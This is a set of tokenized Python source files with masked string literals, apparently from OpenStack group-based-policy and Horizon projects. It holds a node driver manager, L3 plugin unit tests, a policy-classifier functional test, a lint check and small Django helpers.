<s> from neutron . _i18n import _LI <EOL> from neutron . common import exceptions as n_exc <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> import stevedore <EOL> from gbpservice . neutron . services . servicechain . plugins . ncp import config <EOL> from gbpservice . neutron . services . servicechain . plugins . ncp import model <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class NodeDriverManager ( stevedore . named . NamedExtensionManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . drivers = { } <EOL> self . ordered_drivers = [ ] <EOL> names = cfg . CONF . node_composition_plugin . node_drivers <EOL> LOG . info ( _LI ( "<STR_LIT>" ) , names ) <EOL> super ( NodeDriverManager , <EOL> self ) . __init__ ( <EOL> '<STR_LIT>' , names , <EOL> invoke_on_load = True , name_order = True ) <EOL> LOG . info ( _LI ( <EOL> "<STR_LIT>" ) , self . names ( ) ) <EOL> self . _register_drivers ( ) <EOL> def _register_drivers ( self ) : <EOL> """<STR_LIT>""" <EOL> for ext in self : <EOL> self . drivers [ ext . name ] = ext <EOL> self . ordered_drivers . append ( ext ) <EOL> LOG . info ( _LI ( "<STR_LIT>" ) , <EOL> [ driver . name for driver in self . ordered_drivers ] ) <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . native_bulk_support = True <EOL> for driver in self . ordered_drivers : <EOL> LOG . info ( _LI ( "<STR_LIT>" ) , <EOL> driver . name ) <EOL> driver . obj . initialize ( driver . name ) <EOL> self . native_bulk_support &= getattr ( driver . obj , <EOL> '<STR_LIT>' , True ) <EOL> def schedule_deploy ( self , context ) : <EOL> """<STR_LIT>""" <EOL> for driver in self . ordered_drivers : <EOL> try : <EOL> driver . obj . validate_create ( context ) <EOL> model . set_node_owner ( context , driver . obj . name ) <EOL> return driver . obj <EOL> except n_exc . NeutronException as e : <EOL> LOG . warning ( e . message ) <EOL> def schedule_destroy ( self , context ) : <EOL> """<STR_LIT>""" <EOL> driver = self . get_owning_driver ( context ) <EOL> if driver : <EOL> model . unset_node_owner ( context ) <EOL> return driver <EOL> def schedule_update ( self , context ) : <EOL> """<STR_LIT>""" <EOL> driver = self . get_owning_driver ( context ) <EOL> if driver : <EOL> driver . validate_update ( context ) <EOL> return driver <EOL> def clear_node_owner ( self , context ) : <EOL> """<STR_LIT>""" <EOL> model . unset_node_owner ( context ) <EOL> def get_owning_driver ( self , context ) : <EOL> owner = model . get_node_owner ( context ) <EOL> if owner : <EOL> driver = self . drivers . get ( owner [ <NUM_LIT:0> ] . driver_name ) <EOL> return driver . obj if driver else None </s>
<s> import mock <EOL> from neutron . common import constants as q_const <EOL> from neutron . common import exceptions as n_exc <EOL> from neutron import context <EOL> from gbpservice . neutron . services . l3_router import l3_apic <EOL> from gbpservice . neutron . tests . unit . services . grouppolicy import ( <EOL> test_apic_mapping ) <EOL> TENANT = '<STR_LIT>' <EOL> ROUTER = '<STR_LIT>' <EOL> SUBNET = '<STR_LIT>' <EOL> NETWORK = '<STR_LIT>' <EOL> PORT = '<STR_LIT>' <EOL> NETWORK_NAME = '<STR_LIT>' <EOL> TEST_SEGMENT1 = '<STR_LIT>' <EOL> FLOATINGIP = '<STR_LIT>' <EOL> class TestCiscoApicL3Plugin ( test_apic_mapping . ApicMappingTestCase ) : <EOL> '''<STR_LIT>''' <EOL> def setUp ( self ) : <EOL> super ( TestCiscoApicL3Plugin , self ) . setUp ( ) <EOL> self . subnet = { '<STR_LIT>' : NETWORK , '<STR_LIT>' : TENANT } <EOL> self . port = { '<STR_LIT>' : TENANT , <EOL> '<STR_LIT>' : NETWORK , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : SUBNET } ] , <EOL> '<STR_LIT:id>' : '<STR_LIT>' } <EOL> self . interface_info = { '<STR_LIT>' : { '<STR_LIT>' : SUBNET } , <EOL> '<STR_LIT:port>' : { '<STR_LIT>' : self . port [ '<STR_LIT:id>' ] } } <EOL> self . floatingip = { '<STR_LIT:id>' : FLOATINGIP , <EOL> '<STR_LIT>' : NETWORK_NAME , <EOL> '<STR_LIT>' : PORT } <EOL> self . context = context . get_admin_context ( ) <EOL> self . context . tenant_id = TENANT <EOL> self . plugin = l3_apic . ApicGBPL3ServicePlugin ( ) <EOL> self . plugin . apic_gbp . _notify_port_update = mock . Mock ( ) <EOL> self . plugin . _core_plugin . get_ports = mock . Mock ( <EOL> return_value = [ self . port ] ) <EOL> self . plugin . _core_plugin . get_port = mock . Mock ( return_value = self . port ) <EOL> self . plugin . _core_plugin . get_subnet = mock . Mock ( <EOL> return_value = self . subnet ) <EOL> self . plugin . _core_plugin . update_port_status = mock . Mock ( ) <EOL> self . plugin . update_floatingip_status = mock . Mock ( ) <EOL> self . plugin . get_floatingip = mock . Mock ( return_value = self . floatingip ) <EOL> def test_reverse_on_delete ( self ) : <EOL> pass <EOL> def _check_call_list ( self , expected , observed ) : <EOL> for call in expected : <EOL> self . assertTrue ( call in observed , <EOL> msg = '<STR_LIT>' <EOL> '<STR_LIT>' % ( str ( call ) , str ( observed ) ) ) <EOL> observed . remove ( call ) <EOL> self . assertFalse ( <EOL> len ( observed ) , <EOL> msg = '<STR_LIT>' % str ( observed ) ) <EOL> def _test_add_router_interface ( self , interface_info ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as if_mock : <EOL> if_mock . return_value = self . port <EOL> port = self . plugin . add_router_interface ( self . context , <EOL> ROUTER , interface_info ) <EOL> self . assertEqual ( port , self . port ) <EOL> test_assert = self . plugin . _core_plugin . update_port_status <EOL> test_assert . assert_called_once_with ( self . context , <EOL> self . port [ '<STR_LIT:id>' ] , q_const . PORT_STATUS_ACTIVE ) <EOL> def _test_remove_router_interface ( self , interface_info ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as if_mock : <EOL> self . plugin . remove_router_interface ( self . context , ROUTER , <EOL> interface_info ) <EOL> self . assertEqual ( <NUM_LIT:1> , if_mock . call_count ) <EOL> def test_add_router_interface_subnet ( self ) : <EOL> self . _test_add_router_interface ( self . interface_info [ '<STR_LIT>' ] ) <EOL> def test_add_router_interface_port ( self ) : <EOL> self . _test_add_router_interface ( self . interface_info [ '<STR_LIT:port>' ] ) <EOL> def test_remove_router_interface_subnet ( self ) : <EOL> self . _test_remove_router_interface ( self . interface_info [ '<STR_LIT>' ] ) <EOL> def test_remove_router_interface_port ( self ) : <EOL> self . _test_remove_router_interface ( self . interface_info [ '<STR_LIT:port>' ] ) <EOL> def test_create_router_gateway_fails ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> side_effect = n_exc . NeutronException ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } <EOL> self . assertRaises ( n_exc . NeutronException , <EOL> self . plugin . create_router , self . context , data ) <EOL> routers = self . plugin . get_routers ( self . context ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( routers ) ) <EOL> def test_floatingip_port_notify_on_create ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> self . plugin . create_floatingip ( self . context , <EOL> { '<STR_LIT>' : self . floatingip } ) <EOL> self . plugin . apic_gbp . _notify_port_update . assert_called_once_with ( <EOL> mock . ANY , PORT ) <EOL> def test_floatingip_port_notify_on_reassociate ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> new_fip = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . plugin . update_floatingip ( self . context , FLOATINGIP , <EOL> { '<STR_LIT>' : new_fip } ) <EOL> self . _check_call_list ( <EOL> [ mock . call ( mock . ANY , PORT ) , <EOL> mock . call ( mock . ANY , '<STR_LIT>' ) ] , <EOL> self . plugin . apic_gbp . _notify_port_update . call_args_list ) <EOL> def test_floatingip_port_notify_on_disassociate ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> self . plugin . update_floatingip ( self . context , FLOATINGIP , <EOL> { '<STR_LIT>' : { } } ) <EOL> self . plugin . apic_gbp . _notify_port_update . assert_called_once_with ( <EOL> mock . ANY , PORT ) <EOL> def test_floatingip_port_notify_on_delete ( self ) : <EOL> with mock . patch ( '<STR_LIT>' ) : <EOL> self . plugin . delete_floatingip ( self . context , FLOATINGIP ) <EOL> self . plugin . apic_gbp . _notify_port_update . assert_called_once_with ( <EOL> mock . ANY , PORT ) <EOL> def test_floatingip_status ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> fip = self . plugin . create_floatingip ( self . context , <EOL> { '<STR_LIT>' : self . floatingip } ) <EOL> self . plugin . update_floatingip_status . assert_called_once_with ( <EOL> mock . ANY , FLOATINGIP , q_const . FLOATINGIP_STATUS_ACTIVE ) <EOL> self . assertEqual ( q_const . FLOATINGIP_STATUS_ACTIVE , fip [ '<STR_LIT:status>' ] ) <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> self . plugin . update_floatingip_status . reset_mock ( ) <EOL> self . floatingip . pop ( '<STR_LIT>' ) <EOL> fip = self . plugin . update_floatingip ( self . context , FLOATINGIP , <EOL> { '<STR_LIT>' : self . floatingip } ) <EOL> self . plugin . update_floatingip_status . assert_called_once_with ( <EOL> mock . ANY , FLOATINGIP , q_const . FLOATINGIP_STATUS_DOWN ) <EOL> self . assertEqual ( q_const . FLOATINGIP_STATUS_DOWN , fip [ '<STR_LIT:status>' ] ) <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> self . plugin . update_floatingip_status . reset_mock ( ) <EOL> self . floatingip [ '<STR_LIT>' ] = PORT <EOL> fip = self . plugin . update_floatingip ( self . context , FLOATINGIP , <EOL> { '<STR_LIT>' : self . floatingip } ) <EOL> self . plugin . update_floatingip_status . assert_called_once_with ( <EOL> mock . ANY , FLOATINGIP , q_const . FLOATINGIP_STATUS_ACTIVE ) <EOL> self . assertEqual ( q_const . FLOATINGIP_STATUS_ACTIVE , fip [ '<STR_LIT:status>' ] ) </s>
<s> import commands <EOL> import logging <EOL> import os <EOL> import sys <EOL> from libs import config_libs <EOL> from libs import utils_libs <EOL> from libs import verify_libs <EOL> def main ( ) : <EOL> test = test_gbp_pc_func ( ) <EOL> if test . test_gbp_pc_func_1 ( ) == <NUM_LIT:0> : <EOL> test . cleanup ( tc_name = '<STR_LIT>' ) <EOL> if test . test_gbp_pc_func_2 ( ) == <NUM_LIT:0> : <EOL> test . cleanup ( tc_name = '<STR_LIT>' ) <EOL> if test . test_gbp_pc_func_3 ( ) == <NUM_LIT:0> : <EOL> test . cleanup ( tc_name = '<STR_LIT>' ) <EOL> if test . test_gbp_pc_func_4 ( ) == <NUM_LIT:0> : <EOL> test . cleanup ( tc_name = '<STR_LIT>' ) <EOL> test . cleanup ( ) <EOL> utils_libs . report_results ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> class test_gbp_pc_func ( object ) : <EOL> logging . basicConfig ( <EOL> format = '<STR_LIT>' , <EOL> level = logging . WARNING ) <EOL> _log = logging . getLogger ( __name__ ) <EOL> cmd = '<STR_LIT>' <EOL> commands . getoutput ( cmd ) <EOL> hdlr = logging . FileHandler ( '<STR_LIT>' ) <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> hdlr . setFormatter ( formatter ) <EOL> _log . addHandler ( hdlr ) <EOL> _log . setLevel ( logging . INFO ) <EOL> _log . setLevel ( logging . DEBUG ) <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> self . gbpcfg = config_libs . Gbp_Config ( ) <EOL> self . gbpverify = verify_libs . Gbp_Verify ( ) <EOL> self . cls_name = '<STR_LIT>' <EOL> self . act_name = '<STR_LIT>' <EOL> def cleanup ( self , tc_name = '<STR_LIT>' ) : <EOL> if tc_name != '<STR_LIT>' : <EOL> self . _log . info ( '<STR_LIT>' % ( tc_name ) ) <EOL> for obj in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:action>' ] : <EOL> self . gbpcfg . gbp_del_all_anyobj ( obj ) <EOL> def test_gbp_pc_func_1 ( self ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , self . cls_name ) <EOL> if cls_uuid != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:0> , self . cls_name , cls_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , self . cls_name , id = cls_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , self . cls_name ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( self . cls_name ) ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:0> , self . cls_name , cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , self . cls_name , id = cls_uuid , shared = '<STR_LIT:False>' ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , self . cls_name ) <EOL> if cls_uuid : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , cls_uuid ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:0> , self . cls_name , cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , self . cls_name , id = cls_uuid , shared = '<STR_LIT:False>' ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> def test_gbp_pc_func_2 ( self ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , self . cls_name ) <EOL> if cls_uuid != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , '<STR_LIT>' , cls_uuid , name = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , '<STR_LIT>' , cls_uuid , protocol = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , '<STR_LIT>' , cls_uuid , direction = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , '<STR_LIT>' , cls_uuid , port_range = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:0> , '<STR_LIT>' , cls_uuid , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> id = cls_uuid , <EOL> protocol = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , cls_uuid ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:1> , '<STR_LIT>' , id = cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> def test_gbp_pc_func_3 ( self ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , self . cls_name ) <EOL> if cls_uuid != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , <EOL> '<STR_LIT>' , <EOL> cls_uuid , <EOL> name = '<STR_LIT>' , <EOL> protocol = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> description = "<STR_LIT>" ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:0> , '<STR_LIT>' , cls_uuid , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> id = cls_uuid , <EOL> protocol = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> description = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:1> , '<STR_LIT>' , id = cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> def test_gbp_pc_func_4 ( self ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> act_uuid = self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:1> , '<STR_LIT:action>' , self . act_name ) <EOL> if act_uuid == <NUM_LIT:0> : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> os . _exit ( <NUM_LIT:1> ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> self . cls_name , <EOL> protocol = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> description = "<STR_LIT>" ) <EOL> if cls_uuid == <NUM_LIT:0> : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , <EOL> self . cls_name , <EOL> id = cls_uuid , <EOL> protocol = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> description = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for n in range ( <NUM_LIT:1> , <NUM_LIT:11> ) : <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT>' % <EOL> ( n ) , classifier = cls_uuid , action = act_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( n ) ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_policy_verify_all ( <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % <EOL> ( n ) , <EOL> policy_classifier_id = cls_uuid , <EOL> policy_actions = act_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( n ) ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:11> ) : <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:0> , '<STR_LIT>' , '<STR_LIT>' % <EOL> ( i ) ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , cls_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:1> , '<STR_LIT>' , id = cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import re <EOL> """<STR_LIT>""" <EOL> mutable_default_args = re . compile ( r"<STR_LIT>" ) <EOL> def no_mutable_default_args ( logical_line ) : <EOL> msg = "<STR_LIT>" <EOL> if mutable_default_args . match ( logical_line ) : <EOL> yield ( <NUM_LIT:0> , msg ) <EOL> def factory ( register ) : <EOL> register ( no_mutable_default_args ) </s>
<s> from django . conf . urls import url <EOL> from horizon . test . test_dashboards . cats . kittens . views import IndexView <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> ] </s>
<s> import copy <EOL> from django . forms . utils import flatatt <EOL> class HTMLElement ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . attrs = getattr ( self , "<STR_LIT>" , { } ) <EOL> self . classes = getattr ( self , "<STR_LIT>" , [ ] ) <EOL> def get_default_classes ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> def get_default_attrs ( self ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def get_final_attrs ( self , classes = True ) : <EOL> """<STR_LIT>""" <EOL> final_attrs = copy . copy ( self . get_default_attrs ( ) ) <EOL> final_attrs . update ( self . attrs ) <EOL> if classes : <EOL> final_attrs [ '<STR_LIT:class>' ] = self . get_final_css ( ) <EOL> else : <EOL> final_attrs . pop ( '<STR_LIT:class>' , None ) <EOL> return final_attrs <EOL> def get_final_css ( self ) : <EOL> """<STR_LIT>""" <EOL> default = "<STR_LIT:U+0020>" . join ( self . get_default_classes ( ) ) <EOL> defined = self . attrs . get ( '<STR_LIT:class>' , '<STR_LIT>' ) <EOL> additional = "<STR_LIT:U+0020>" . join ( getattr ( self , "<STR_LIT>" , [ ] ) ) <EOL> non_empty = [ test for test in ( defined , default , additional ) if test ] <EOL> final_classes = "<STR_LIT:U+0020>" . join ( non_empty ) . strip ( ) <EOL> return final_classes <EOL> @ property <EOL> def attr_string ( self ) : <EOL> """<STR_LIT>""" <EOL> return flatatt ( self . get_final_attrs ( ) ) <EOL> @ property <EOL> def attr_string_nc ( self ) : <EOL> """<STR_LIT>""" <EOL> return flatatt ( self . get_final_attrs ( False ) ) <EOL> @ property <EOL> def class_string ( self ) : <EOL> """<STR_LIT>""" <EOL> classes_str = "<STR_LIT:U+0020>" . join ( self . classes ) <EOL> return classes_str </s>
